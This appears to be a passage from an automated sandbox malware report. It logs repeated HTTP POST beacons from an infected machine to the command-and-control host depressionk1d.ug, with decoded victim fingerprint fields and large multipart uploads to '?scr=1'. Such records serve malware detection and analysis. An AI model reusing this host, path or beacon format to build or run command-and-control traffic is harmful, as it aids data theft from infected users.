              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----35cdb41c8aae8e685df6a1946f054310Host: depressionk1d.ugContent-Length: 111710Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----681dc45aa8e7e3e73e55f3d3bf467b87Host: depressionk1d.ugContent-Length: 106842Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----7528d71526b232f5f62aa1709e48d5dfHost: depressionk1d.ugContent-Length: 107845Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3529b1c2a4757137df590a1ac8a0c6dbHost: depressionk1d.ugContent-Length: 107582Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----7b616cd57d8ad98a4b4d99fe00a47553Host: depressionk1d.ugContent-Length: 106954Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----8ce385891442aafcc84e0cf96686219eHost: depressionk1d.ugContent-Length: 110494Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
